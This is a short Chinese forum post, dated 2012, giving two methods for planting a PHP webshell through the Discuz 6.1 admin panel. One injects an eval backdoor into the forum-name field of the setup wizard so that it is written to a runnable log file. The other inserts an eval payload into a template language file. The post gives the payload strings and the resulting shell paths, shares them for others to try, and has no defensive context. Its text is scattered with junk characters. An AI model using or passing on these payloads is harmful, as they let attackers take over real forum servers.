discuz6.1两种方法后台拿shell
# _0 E* ~; l4 T$ M6 `: R好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
* K3 L9 {& c l7 j$ m, r! Z3 V7 \1:
2 v# i/ E' b* \) p! B9 k m" Ahttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
" E+ d B0 F, k- }: H: uadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
1 I) S7 p) o5 j<?php eval($_POST[cmd]);?>' k1 \' b$ Y' s a9 m% G. G
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
& L, Q4 Z6 B" j
1 e+ c, n2 g% `, W
I! ?; @* i9 A3 s& M& m2:后台模板管理--默认模板套系--详情$ s- ^" Y4 ^; T& R" y* [
templates/default/actions.lang.php
! K' P: {2 z; q! }2 njhackj\\');eval($_POST[cmd])?>;//' d6 f. R# L) |$ l" L5 ~3 P. i
2 i) a$ i; {( }/ |
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
分享
支持
反对